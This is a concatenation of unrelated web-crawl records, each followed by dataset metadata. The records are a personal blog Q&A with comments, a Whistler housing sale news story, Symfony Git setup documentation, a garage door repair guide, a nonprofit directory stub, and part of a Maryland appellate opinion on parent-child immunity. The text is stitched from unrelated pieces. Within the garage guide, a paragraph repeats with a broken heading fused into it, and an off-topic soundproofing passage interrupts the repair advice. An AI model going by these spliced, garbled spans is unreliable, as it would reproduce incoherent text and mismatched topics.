6. In a few words, weigh in on the current football/National Anthem brouhaha. Keep it family friendly please. I think we should respect our National Anthem, what it means to live in a free country and have the benefits and rights that so many others don't. Sports are a national pastime, our children look up to those players. I feel like it's our duty to be respectful adults!
7. Where do you have loads of patience, and where do you most lack patience? Loads of patience...hmmmm? Let me get back to you there. I have a lack of patience for ignorance and bigotry.
8. Insert your own random thought here. “Autumn seemed to arrive suddenly that year. The morning of the first September was crisp and golden as an apple.” ― J.K. RowlingHarry Potter and the Deathly Hallows
1. I love your random. :-)
The book you mention sounds interesting...I will have to check it out.
1. It's a good one, the writer is a cancer survivor and has a realistic, positive outlook on life. I loved it!
2. I love that random thought! Perfect!! I also need to check out that book you mentioned.I'm with you on the patience!
3. So, if "working out your brain" makes you smarter, and knitting patterns make me wrap my head around them.... xD This means knitting makes me smarter, right?! xD
We don't do sports either. We don't really understand the fuss, nor are we the athletic types. Our families, however, are a bit insane. The Mister's mom likes the Seahawks, and my mom likes the 49'ers, and I'm not looking forward to the crap they'll give each other over the next coming months (all in good sport, of course)!
4. I will have to look for that book. We are trying to unplug more, and get to the library more often! I'm with you on both sides of the patience scale :)
5. This was so fun! I got to learn a lot more about you. I wish I did everything on #4, but I have always wanted to play a musical instrument and never really learned to play anything (at least not very well).
6. So glad you joined in this week. I'm a little slow getting around to reading answers, but it was fun to read yours. Autumn rolls in and feels a lot like summer here in SC, but the sky is changing and even the leaves. The air and light feel different and I know fall is on the way. Have a great day!
Designed by Delxue Designs | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '130', 'language_id_whole_page_fasttext': "{'en': 0.9633556604385376}", 'metadata': "{'Content-Length': '99146', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:KVOASJW6Z36SNOZ2JOJ7KPTPQ4MFH4BJ', 'WARC-Concurrent-To': '<urn:uuid:4f4687ef-95cb-46d7-a960-9e1a5b5cf495>', 'WARC-Date': datetime.datetime(2017, 5, 23, 18, 46, 15), 'WARC-IP-Address': '172.217.7.129', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:3M3OH5OYWNM5ZIGZY6CHUEGV3TWWN6BD', 'WARC-Record-ID': '<urn:uuid:7dbfbb40-4e09-4af0-9e4c-d942ba61d161>', 'WARC-Target-URI': 'http://barefootbysea.blogspot.com/2016/09/wednesday-classical-hodgepodge-just-in.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:d9a4b62a-a2cc-4078-90b8-2e6572ee3235>', 'WARC-Truncated': None}", 'previous_word_count': '810', 'url': 'http://barefootbysea.blogspot.com/2016/09/wednesday-classical-hodgepodge-just-in.html', 'warcinfo': 'robots: classic\r\nhostname: ip-10-185-224-210.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2017-22\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for May 2017\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.03749328851699829', 'original_id': '21fa60a65cb870b823b7fa1f1c2c9e591c0519d970c3e421d46ba9720ea25a35'} |
WHA rental building goes up for sale
Tenants given first crack at 21-unit Nordic Court property
Ian Bartley and Melanie Bigney never believed they would own a home in Whistler in the near future.
They certainly didnt think theyd be Whistler homeowners by the middle of the summer.
But a unique opportunity from the Whistler Housing Authority fell right into their laps recently, just as they were getting more and more discouraged about their buying power in the Squamish market.
"Were going to own in Whistler first of all, that in itself is a pretty exciting thought," said Bartley.
"We really thought that for the amount we got pre-approved for we would never find anything here in Whistler."
The couple, who have been living in Whistler for three to four years, didnt have to look much further than their Nordic Court mailbox for their new home.
A letter from the Whistler Housing Authority advised them that the one-bedroom unit they were renting from the WHA at 2007 Nordic Court was now up for sale. And they, as the rental tenants, have first dibs.
It was just what they were looking for.
The sale of the 21-unit complex is now underway.
The one bedroom units are 646 square feet. They will sell for approximately $217,000 and $219,000.
The two bedroom units are 737 square feet and will sell for between $305,000 and $319,000, depending on location in the building.
Tim Wake, WHA general manager, said those prices are a little lower than the current market value.
But the WHA wanted to market them as a good deal, ensuring that they could sell all 21 units at once, and at the same time they did not want to affect the prices in the neighbouring 2005 Nordic Court building.
Now both Nordic Court buildings will be employee-restricted but there will be no restrictions on their resale or rental value.
That was a huge selling point for Bartley.
"The most exciting thing about it was the fact that it wasnt going to be subject to the resale cap," he said.
"Most other Whistler Housing places are."
Another selling point for the couple, who both work for the Fairmont Chateau Whistler, was that their lifestyle will not have to change. They would have faced a much longer commute to work had they moved to Squamish.
Now their monthly rent cheque will simply become their monthly mortgage payment.
Wake explained the WHAs rationale for selling off their rental units in this complex.
The building was built in 1988 as part of a two-building complex.
The project has increased in value over recent years.
"We can do so much more with that equity," he said.
"Well sell 21 units and well be able to build probably 100 units."
The units are expected to generate $5 million from this sale. That money will go directly into the housing fund for future projects.
In addition to the money, Wake said the WHA recognized a growing need for ownership opportunities in Whistler, as opposed to rental.
"The intent is to sell them to owner occupiers," he said.
Bartley said the initiative is a great idea even though there are only 21 units for sale and hundreds of people on the WHA waitlist.
"Its encouraging to see that Whistler Housing is doing that but its still frustrating to think that its a three year wait (for some) to get into a place," he said.
Wake said Bartley and his partner are a perfect example of the benefit of selling off this complex.
The couple was planning to move to Squamish and had even put bids into some places. Now they have been enticed to stay in Whistler.
"Its always exciting when what were doing actually works for people and keeps people here," he said.
"Thats why Im excited. Its a win for the community."
Renters in the complex will have until July 15 to submit a contract to the WHA along with a deposit cheque for 5 per cent of the unit price.
After that, on July 20, the WHA will hold an open house for housing waitlist applicants as well as owners of the other Nordic building who may want to upgrade to a bigger unit.
The units will be released to the public at a July 24 open house.
The WHA will help tenants who are not interested in buying a unit find another rental opportunity in another employee-restricted rental property.
The WHA will also honour all existing tenancies until the date of the lease termination.
For information about the sale of 2007 Nordic Place called the WHA at 604-905-4688 or e-mail mail@whistlerhousing.ca | mini_pile | {'original_id': '296e3a1336a9aa9f456d9a8f8ed81f955fad0a32a5a4bfa912ef1d3347955401'} |
How to Create and Store a Symfony Project in Git
3.1 version
Maintained Unmaintained
How to Create and Store a Symfony Project in Git
Though this entry is specifically about Git, the same generic principles will apply if you're storing your project in Subversion.
Once you've read through Create your First Page in Symfony and become familiar with using Symfony, you'll no-doubt be ready to start your own project. In this article, you'll learn the best way to start a new Symfony project that's stored using the Git source control management system.
Initial Project Setup
To get started, you'll need to download Symfony and get things running. See the Installing & Setting up the Symfony Framework chapter for details.
Once your project is running, just follow these simple steps:
1. Initialize your Git repository:
$ git init
2. Add all of the initial files to Git:
$ git add .
As you might have noticed, not all files that were downloaded by Composer in step 1, have been staged for commit by Git. Certain files and folders, such as the project's dependencies (which are managed by Composer), parameters.yml (which contains sensitive information such as database credentials), log and cache files and dumped assets (which are created automatically by your project), should not be committed in Git. To help you prevent committing those files and folders by accident, the Standard Distribution comes with a file called .gitignore, which contains a list of files and folders that Git should ignore.
You may also want to create a .gitignore file that can be used system-wide. This allows you to exclude files/folders for all your projects that are created by your IDE or operating system. For details, see GitHub .gitignore.
3. Create an initial commit with your started project:
$ git commit -m "Initial commit"
At this point, you have a fully-functional Symfony project that's correctly committed to Git. You can immediately begin development, committing the new changes to your Git repository.
The Symfony Standard Edition comes with some example functionality. To remove the sample code, follow the instructions in the "How to Remove a Bundle" article.
Managing Vendor Libraries with composer.json
How Does it Work?
$ composer require doctrine/doctrine-fixtures-bundle
To learn more about Composer, see GetComposer.org:
Storing your Project on a remote Server
You now have a fully-functional Symfony project stored in Git. However, in most cases, you'll also want to store your project on a remote server both for backup purposes, and so that other developers can collaborate on the project.
The easiest way to store your project on a remote server is via a web-based hosting service like GitHub or Bitbucket. Of course, there are more services out there, you can start your research with a comparison of hosting services.
Alternatively, you can store your Git repository on any server by creating a barebones repository and then pushing to it. One library that helps manage this is Gitolite.
| dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '427', 'language_id_whole_page_fasttext': "{'en': 0.9248358011245728}", 'metadata': "{'Content-Length': '79628', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:C3WWK7DZUVU3DLVL6CUI6T27TUNCAI6Y', 'WARC-Concurrent-To': '<urn:uuid:bf5f7306-365b-422a-bb2f-ba8fde50bab3>', 'WARC-Date': datetime.datetime(2019, 4, 25, 10, 23, 54), 'WARC-IP-Address': '104.26.15.6', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:ONXJKQ2ZDLYTKKUZLGWYCH4RBL7QGUGY', 'WARC-Record-ID': '<urn:uuid:88af3fac-8756-4a10-93d4-43c03fb6076c>', 'WARC-Target-URI': 'https://symfony.com/doc/3.1/setup/new_project_git.html', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:8338f4d8-fd72-4304-8bf0-d69e99c3dde0>', 'WARC-Truncated': None}", 'previous_word_count': '893', 'url': 'https://symfony.com/doc/3.1/setup/new_project_git.html', 'warcinfo': 'isPartOf: CC-MAIN-2019-18\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for April 2019\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-141-45-27.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.07587659358978271', 'original_id': '13466f00f0284ee015db5e5927ca6cd89b1ff5168bb0170bb7d1739023d7e95b'} |
Garage Organization Becomes Awesome with These Ideas
We use our garage doors practically every day, sometimes many times a day, but how much attention do we really give the garage door? If failure is going to occur, there’s a good chance that failure occurs after ignoring a persistent call for help, or after years of neglected maintenance.
Garage door mechanisms are relatively simple, but they move up and down day in and day out, and anything in constant motion needs some routine maintenance now and then. If the system is slightly out of alignment or balance, we need to fix it before it leads to critical problems.
If maintenance is skipped and calls for help from your door ignored, then most likely you are now at the point of needing garage door repairs, so let’s take a look at some of the common failures.
Finding the Problem
To diagnose the problem with a garage door, we need to step through the likely causes. Fault types are usually from three areas, mechanical, power and remote, or sensors.
If the door does not move smoothly with manual operation, it is likely there is a mechanical failure. The rails and rollers may be damaged, need cleaning, or lubrication, springs may need adjustment or replacement, or the gear and chain could be damaged.
If the door motor simply won’t operate it is likely a power or motor failure.
Failure of the remote operation will be caused by the remote control system, either the remote itself or the receiver.
If a door fails to open or close fully, but manual operation is normal, it is usually caused by a limit switch or sensor.
Next, we’re going to explain all of these faults a little more in depth, with a fault finding quick reference guide and some frequently asked questions at the end.
Overhead Garage Door Repair
Garage Door Spring Adjustment or Spring Replacement
Springs on a garage door are under massive amounts of tension, so if they need adjustment or replacement, it is best to call an expert before risking injury unless you know what you are doing.
The function of garage door springs , whether they are torsion springs or extension springs, is to reduce the loads required for opening the garage door.
Springs are coiled tightly under tension and will lose their elasticity over time from the applied forces. Replacement is needed on average between 5 and 15 years depending on how well maintained they are. When springs lose their elasticity, there is some scope to adjust them back to the original tension before full replacement is needed.
Spring wear without adjustment can place heavy loads on a garage door motor and railings which they are not designed to cope with, so if the correct spring is not set correctly, it can lead to a costly failure of the motor or gear.
If the springs are not adjusted evenly on both sides, this will create differential loads on the motor, gear, and railings, which can also lead to premature failure.
The best way to test for worn springs is to operate the garage door manually to determine if there is any imbalance or excessive force required. If the answer is yes to either of these, the springs need adjustment or replacement.
Garage Door Opener Failure
Failure of the garage door remote control is the most straightforward issue to diagnose, especially if there is a separate operating switch for the motor, for example, a wall switch or keypad.
If the remote fails to work, but the door operates fine from the wall switch or keypad, then you can be assured the remote operation is at fault.
The most likely cause of a faulty remote the battery requires to be replaced. If the battery is not the cause of the problem, the remote may need reprogramming. Distant memory can sometimes be affected by exposure to magnetic or electric fields. Battery motor instructions should provide details of how to reprogram garage Door Opener Failure
The most likely cause of a faulty remote the battery requires to be replaced. Distant memory can sometimes be affected by exposure to magnetic or electric fields. Battery motor instructions should provide details of how to reprogram a remote without needing to call an expert. If this is not available, or if reprogramming the remote doesn’t work, then it is most likely that some component inside the remote was damaged, and it needs to be replaced.
An uncommon cause of failure of the remote operation (a door opener or keypad which is not physically connected) is receiver damage. The receiver is the sensor that the remote sends the first signal to. This medium is usually a small antenna located on the motor. If the receiver is damaged or bent, it may not adequately receive the message from the remote operation.
Garage Door Power Failure
If neither remote control nor switch operates a garage door, then either there is no electricity to the opener, or the motor itself has failed.
Don’t overlook the simple explanations such as a circuit breaker or fuse controlling the circuit has tripped and needs to be replaced or reset, or the opener’s electrical plug has been pulled out. A loose wire or fuse on the motor will also prevent any operation of the motor and is often quite easy to see by visual inspection.
If the motor itself has failed, there is usually a burnt appearance accompanied by a smell of electrical burning when the motor fails, although this may not happen in every case. Excessive forces needed to open and close the door due to worn springs may cause motor failure.
The garage is just so perfect though
Big garage, lots of room to have a small band to rehearse? Seems to good to let go of the idea. So let’s get it right and solve your noise problems while saving your neighbors ears and good will.
But remember, you cannot choose your neighbors. You have to learn how best to live with them. Sounds challenging? It need not be. How best can you achieve this?
You will need to do some insulation to help curb the noise from your teenagers and their noisy friends. Using soundproof materials will help. There is another bonus of having a noise reduced garage. YOU can make all the noise you want too. Both you and your husband can create whatever racket you please. Dad finally gets a place to do his hobby and a den to hang out in (don’t let drunk friends on the kid’s drum kit though).
Hanging out with his friends and jamming with them in his own garage …. That will get the old man on board.
Failure to Open or Close Fully or Reversal
A garage door usually has four different sensors, an up-limit switch, close-limit switch, and two safety sensors to check for obstruction.
Failure to open or close entirely or a reversal where the door opens again before closing or at closing is either caused by sensors that are faulty or need resetting, or by damage to the rails causing obstruction. Before checking the limit switches and sensors, manually operate the door to check for any damage. If the door sticks at any point, then the cause of the problem is most likely the rails. Examine the rails to determine if they can be cleared or if replacement is needed.
If the manual operation is relatively smooth and obstruction free, then the reversal or operating failure is most likely caused by a sensor problem.
If a door reverses, that is, opens again before reaching the ground, or on reaching the ground, the close-limit switch is possibly too sensitive. Adjusting the sensitivity of the close limit switch should solve the problem. Close limit switches can be adjusted carefully in small increments until the door achieves the desired position. Take care to ensure it is not under-sensitive as the close-limit also acts as a safety mechanism in case an item, person, or pet is obstructing the door.
Failure to open or close entirely can in some cases be the safety sensors – infrared beams which check for obstruction. If these blocked, the door will cease to operate.
If the door fails to open fully or if the motor continues to run after opening then the fault is likely in the setting of the up-limit switch. The up-limit switch can be adjusted closer to the motor if the door fails to open fully, and further away from the motor if the motor fails to stop running. This seems counter-intuitive, but that is usually how the up-limit switch works.
Garage Door Gear Failure
A gear connects the chain, which opens and closes the door, to the motor. If there is excessive force needed to open and close the garage door due to worn springs, rollers, or rails, the motor may be still capable of lifting the door, but there will be high forces on the gear, which may cause it to fail prematurely.
A garage door gear failure will be pretty evident, by the sound of mechanical failure accompanied by failure o operate. The gear failure can usually be seen visually on inspection of the motor housing where the gear is located. If a gear failure occurs, a replacement is needed.
2. Steel back doors
Noisy Garage Doors
A noisy garage door may simply require lubrication of moving parts or may need replacement of springs, rollers, or railings. Metal rollers can be replaced cheaply by nylon rollers, which make far less noise and do not require as much regular lubrication. Rollers themselves are quite cheap, but because replacement requires some complex reassembly, it may be wise to get expert services for the labor.
Damaged Sections
Accidental damage due to inadvertent collision with a vehicle or object can cause irreparable panel or railing damage. While straightening is possible, usually a choke point will remain, that will cause unnecessary stress on the motor and gear mechanism. The rails and damaged sections (where parts are available) need to be replaced.
Cleaning Rails and Rollers and Pivots
Most sectional garage doors open with a set of rails and rollers, some full doors operate on an over-center pivot. Both have sections, which attract debris that will cause failure if not cleaned properly. Rails or pivots may become obstructed from time to time with dirt, cobwebs, nests, or leaves. It’s essential to check rails and clean them to ensure that a garage door.
Frozen Rollers
Failure of a garage door in sub-zero conditions feels terrible since you don’t want to spend time fault finding outside and it usually happens early in the morning when you are rushing to work. But the good news is it’s most likely only moisture that has frozen the rollers and is easily fixed. If the garage door fails to open in freezing conditions, don’t keep trying to operate the remote as it can potentially burn out the motor. Try opening the door manually and if it is stuck, then attempt to find out where the door is frozen and apply some heat.
Repair Versus Replacement
In some cases, it is more viable to replace an entire door than repair sections. This may be the case where a door is aged as well as damaged. A new door will cost slightly more but comes with a new lifespan and warranty.
Any moving parts need regular lubrication, if your garage door is making squeaking or grinding sounds there is a good chance that it needs a little lube.
Broken Glass
Broken glass should always be repaired as soon as possible by measuring ordering and refitting a new piece. Broken glass is a safety, security, and pest hazard.
Regular Maintenance
Regular maintenance of a garage door should include checking rails for obstruction and cleanliness, brushing off dirt, and lubricating moving parts. Additionally, open and close the door manually to ensure smooth operation without undue force, to check if the springs are okay.
Safety Inspections
A periodic check of the close-switch for functionality in case of an obstruction is important for safety. If the close-switch is not sensitive enough or not functioning, a person or animal could end up badly injured by being trapped in the door. If the close-switch is operating correctly, mild force should result in the door reopening. This function is easy to self-check periodically, and if there is any excessive force needed to stop the door from closing, the close-switch should be adjusted until the door closes correctly, but re-opens if any counter force is applied mid-operation. Safety inspections will also check loose fitting, springs and moving parts to ensure alignment is correct to prevent a harmful failure.
Quick Fault Finding Guide
Garage door won’t open fully; manual operation is smooth
• The Up-switch needs to be adjusted closer to the motor
Garage door won’t close fully; manual operation is smooth
• The close-switch sensitivity needs to be adjusted
• The safety eyes are obstructed
Garage Door Won’t Operate at All
• There is no power to the motor, check all wiring, plugs, and fuses
• The motor has burned out and needs replacing
Garage Door is Difficult to Operate Manually
• The railing is rusted, bent, or damaged in some way
• There is an obstruction in the railing
• The springs need adjustment or replacement
Garage Door Reverses
• The close-switch needs to be adjusted for reduced sensitivity
Garage Door Motor Runs On
• The up-switch needs to be adjusted away from the motor
Garage Door Won’t Open By Remote
• The remote needs to have the battery replaced
• The remote needs to be reprogrammed
• The remote is faulty and needs to be replaced
• The receiver is defective and needs servicing
FAQs about Garage Door Repairs
When should I consult an expert?
Spring replacement, roller replacement, and motor replacement will typically need an expert. Spring adjustment is quite hazardous and expert services are recommended. If operation is noisy or difficult, and the cause cannot be resolved, this is a good reason to call an expert before a serious problem develops.
Owners can do routine maintenance, reprogramming, and limit switch adjustment easily if sufficient information is available in the door opener’s operating manual.
What does it usually cost for maintenance of a garage door?
A garage door routine service or safety check costs around 75$. Check out our specials!
What does a garage door repair normally cost?
Repair costs will depend on the fault and the urgency. Springs and rollers cost around $20 to $40, while labor costs will typically start at about $100 for most repairs, making the total around $150 to $300.
If your garage door maintenance seems like a nightmare, it’s straightforward and inexpensive to get an expert in to have a look before the problem ends up in total failure, becomes catastrophic, and far more costly. Murphy’s law, total failures are always much more likely to happen after hours, so rather get the maintenance seen to before it becomes really inconvenient and expensive. | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '59', 'language_id_whole_page_fasttext': "{'en': 0.9225158095359802}", 'metadata': "{'Content-Length': '106485', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:4ISKGG53DKIWMWUYDBCZDSRSD3362YGR', 'WARC-Concurrent-To': '<urn:uuid:bd3de2ed-9609-47c4-8510-cb993326f1f2>', 'WARC-Date': datetime.datetime(2021, 9, 21, 16, 47, 50), 'WARC-IP-Address': '74.208.178.119', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:2M2CJRRO22ENGZX5NDID43PWX74LJHTW', 'WARC-Record-ID': '<urn:uuid:b9c349fc-3fac-4040-a290-6281525b605c>', 'WARC-Target-URI': 'https://garageworkstn.com/garage-organization-becomes-awesome/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:1ff882e1-d66d-4811-9d3f-5ea89fb1ca3d>', 'WARC-Truncated': None}", 'previous_word_count': '2544', 'url': 'https://garageworkstn.com/garage-organization-becomes-awesome/', 'warcinfo': 'isPartOf: CC-MAIN-2021-39\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for September 2021\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-22\r\nsoftware: Apache Nutch 1.18 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.03250420093536377', 'original_id': 'd4158638e82daaaca4a1116d80d6293b65ae0c6745f4c16e92d90e7bd87b0d25'} |
Connect With Lithonia Nonprofits and Charities
Lithonia Nonprofits and Charities
Want to donate to or volunteer for a Lithonia charity or nonprofit? Browse this list of nonprofits in Lithonia, GA to see ratings, read reviews, and learn about their programs. Find top Lithonia nonprofits and charities and start volunteering or donating today. If you have worked with a nonprofit, write a review and tell your story.
Find and share experiences about a
Lithonia nonprofit
Write A Review
Filter by Issue | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '27', 'language_id_whole_page_fasttext': "{'en': 0.896202027797699}", 'metadata': "{'Content-Length': '69280', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:CNGWOXF3JA2YGQGPWK3HYYVHFXHBJJYK', 'WARC-Concurrent-To': '<urn:uuid:1f04e4e6-99e1-4d65-b2ae-bf43f5b098d3>', 'WARC-Date': datetime.datetime(2014, 8, 1, 16, 26, 13), 'WARC-IP-Address': '107.20.238.32', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:WXU2R73JDFDS3RLNQFRBHRXPH64SQPI3', 'WARC-Record-ID': '<urn:uuid:b1c470ed-7622-46ef-895d-9fbddad6aa02>', 'WARC-Target-URI': 'http://greatnonprofits.org/city/Lithonia/GA/search:inside%20the%20orchestra/sort:relevance/direction:desc', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:91e8b40c-8be6-4c45-83db-54427d7a1169>', 'WARC-Truncated': 'length'}", 'previous_word_count': '106', 'url': 'http://greatnonprofits.org/city/Lithonia/GA/search:inside%20the%20orchestra/sort:relevance/direction:desc', 'warcinfo': 'robots: classic\r\nhostname: ip-10-146-231-18.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2014-23\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for July 2014\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.03621363639831543', 'original_id': '69d1b855161471828b0e31cf2d53c7de345e7edc20143f7e8c104dbd1772829c'} |
We decline to abrogate the parent-child immunity rule in its entirety as to actions sounding in negligence or to exclude motor torts therefrom.
VIII
The automobile which the father was driving and in which the injured minor son was a passenger was the only motor vehicle involved in the accident. It was covered by an insurance policy. The bodily injury and property damage liability coverage of the policy applied to the automobile; it was, therefore, an "insured highway vehicle" as defined in the policy. The policy also provided coverage as to unin sured motorists as required by law. See Md.Code (1957, 1979 Repl.Vol., 1985 Cum.Supp.) Art. 48A, § 541(c).
Barbara contends that because the parent-child immunity rule precluded a suit by the son for the father's negligence, the father "was rendered an uninsured motorist, giving the [son] rise to a claim under the uninsured motorist provision" of the motor vehicle policy. The short answer is that the automobile operated by the father was in fact an insured vehicle. It was not transformed into an uninsured vehicle because the father was immune to an action in negligence by the son. We see nothing in the policy or the statute which supports Barbara's notion. The father was not an uninsured motorist under the insurance contract or in the eyes of the law. We note that under the policy, the insurer promised to "pay all sums which the insured . shall be legally entitled to recover as damages from the owner or operator of an uninsured highway vehicle because of bodily injury or property damage, caused by accident and arising out of the . use of such uninsured highway vehicle____" (emphasis added). The son, assuming he was an insured, was, nevertheless, not entitled to recover damages from the father, even if the father were an uninsured motorist, because the son was barred from recovery by the parent-child immunity rule. Thus, the uninsured motorist provision of the policy would not be invoked in any event. The parent-child immunity rule closed the front door to redress by the son from the father. The uninsured motorist provision of the policy did not open the back door.
JUDGMENT AFFIRMED; COSTS TO BE PAID BY PETITIONER.
APPENDIX
Retention of the Immunity
Alabama, Arkansas, Georgia, Indiana, Louisiana, Mississippi, Missouri, Nebraska and Tennessee still apply the doctrine of parent-child immunity; however, several of these states have not recently examined the doctrine. One state, Louisiana, retains the immunity in the form of a statute. See La.Rev.Stat.Ann. § 9:571 (1965). The statute is specifically limited to the custodial parent and the state has permitted direct actions against insurers. Three other state courts have refused to abrogate the immunity because they feel any change at this point must come from the legislature. See Hill v. Giordano, 447 So.2d 164 (Ala.1984) (per curiam); Pullen v. Novak, 169 Neb. 211, 99 N.W.2d 16 (1959); Campbell v. Gruttemeyer, 222 Tenn. 133, 432 S.W.2d 894 (1968). A review of the statutory indexes of these three states indicates that the legislatures have not so acted. Other states have noted family harmony, the need for parental control and discipline, as well as the potential for fraud and collusion, as reasons for retaining the immunity. See, e.g., Thomas v. Inmon, 268 Ark. 221, 594 S.W.2d 853, 854 (1980) (policy considerations of family harmony and the prevention of fraud and collusion remain valid); Coleman v. Coleman, 157 Ga.App. 533, 278 S.E.2d 114 (1981) (minor injured in auto accident precluded from suing noncustodial parent-driver because as long as a father-son relationship exists, there is "a continued need for respect and the authority to discipline"); Vaughan v. Vaughan, 161 Ind.App. 497, 316 N.E.2d 455 (1974) (parent-child immunity maintained, even after the abrogation of interspousal immunity, in light of the need for parental control during the child's minority and the adverse effect that would arise vis-a-vis a child's right to bring civil redress), and Hewlett v. George, 68 Miss. 703, 9 So. 885 (1891) (seminal case cited with approval in McNeal v. Administrator of Estate of McNeal, 254 So.2d 521 (Miss.1971)).
Missouri has handled the viability of immunity in a different manner. Essentially, the immunity remains valid but only on a case-by-case basis. Kendall v. Sears Roebuck & Co., 634 S.W.2d 176 (Mo. 1982) (en banc); Fugate v. Fugate, 582 S.W.2d 663 (Mo.1979). In Fugate, the plaintiff-appellant correctly stated the Missouri rule, to wit: "The modern view is that a child may sue a parent in tort if two conditions are present. First, the emancipated child may sue____ Also, the child may maintain a negligence action against the parent if the trial court concludes after an evidentiary hearing that legal proceedings will not disrupt family harmony." 582 S.W.2d at 665 (citations omitted).
Total Abrogation of the Immunity
California has totally abrogated parent-child immunity, and, in its place, adopted a "reasonable parent" standard. Gibson v. Gibson, 3 Cal.3d 914, 479 P.2d 648, 92 Cal.Rptr. 288 (1971). In rendering its decision the court noted that the traditional grounds for maintaining the immunity are no longer valid. Family harmony faces a lesser chance of disruption when an insurer is responsible for the damages. There is some fear of fraud and collusion, but that exists in all cases. The court noted that there is some threat to parental authority and discipline, but did not consider that sufficient to "justify continuation of a blanket rule of immunity." 479 P.2d at 652, 92 Cal.Rptr. at 292. In abrogating the immunity, the court did recognize that traditional concepts of negligence cannot be adhered to in an absolute manner. For example, a spanking does not ordinarily constitute a battery and sending a child to his room does not constitute false imprisonment. The parent's prerogative to exercise authority "must be exercised within reasonable limits." Id. 479 P.2d at 653, 92 Cal.Rptr. at 293. The standard employed is "what would an ordinarily reasonable and prudent parent have done in similar circumstanc es?" Id. (emphasis in original). California has totally abrogated interspousal immunity.
Minnesota has adopted California's reasonable parent standard. Anderson v. Stream, 295 N.W.2d 595 (Minn. 1980). The State formerly adhered to the Goiter approach, discussed infra, but then decided that the two exceptions were imprecise and, accordingly difficult to apply. Hence, the reasonable parent standard was adopted in its stead. Minnesota has also totally abrogated the rule of interspousal immunity.
In abrogating in full the parent-child immunity, the New Mexico Supreme Court reasoned that "[tjhere is no stronger public policy for barring intrafamily suits between parents and children than existed for intraspousal suits." Guess v. Gulf Ins. Co., 96 N.M. 27, 627 P.2d 869, 871 (1981). Moreover, it is the "conduct between the parties that causes the lawsuit to be filed" that causes disharmony, not the lawsuit itself. Id.
New York has also abrogated parent-child immunity, as well as interspousal immunity. Holodook v. Spencer, 36 N.Y.2d 35, 324 N.E.2d 338, 364 N.Y.S.2d 859 (1974) abrogated the defense of intrafamily immunity but tempered that decision by refusing to recognize a cause of action for negligent supervision. The court reasoned that such suits could lead to strain within the family. 324 N.E.2d at 344, 364 N.Y.S.2d at 865. The court also thought that it would be unwise to apply a standardized norm to parental conduct — as was done in California. 324 N.E.2d at 346, 364 N.Y.S.2d at 867. "The result, we believe, would be to circumscribe the wide range of discretion a parent ought to have in permitting his child to undertake responsibility and gain independence." Id. Cf. Nolechek v. Gesuale, 46 N.Y.2d 332, 385 N.E.2d 1268, 413 N.Y.S.2d 340, 344 (1978) (parent does owe a "duty to third parties to shield them from an infant's improvident use of a dangerous instrument, at least, if not especially, when the parent is aware of and capable of controlling its use____").
A North Dakota statute provides that "[ejveryone is responsible not only for the result of his willful acts but also for an injury occasioned to another by his want of ordinary care or skill in the management of his property or person." N.D.Gen.Stat. § 9-10-06 (1975). See also Nuelle v. Wells, 154 N.W.2d 364 (N.D.1967) (no parent-child immunity in light of aforequoted statute).
